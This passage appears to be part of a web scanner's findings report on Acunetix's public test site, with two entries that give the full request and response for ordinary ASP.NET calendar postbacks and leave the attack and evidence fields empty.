daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8256&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAVBqaedoIZGRkV9HllINNaGr6xP%2BDwwBJcILV868%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLk3qaaDwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D6nXkkAY9KnDVg0DKDKEnxDgaSrs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:19 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAVBqaedoIZGRkV9HllINNaGr6xP+DwwBJcILV868=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLk3qaaDwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D6nXkkAY9KnDVg0DKDKEnxDgaSrs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:White" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8535&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAlFPXVNsIZGRkZXPdfRJotDa%2B2ktkFb%2F6UVgoLI8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLK6rvxCwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA7%2BrJ4vZ6FnbH6tJhGY5GyXo9rdK
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:05 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAlFPXVNsIZGRkZXPdfRJotDa+2ktkFb/6UVgoLI8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLK6rvxCwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA7+rJ4vZ6FnbH6tJhGY5GyXo9rdK" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:White" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged 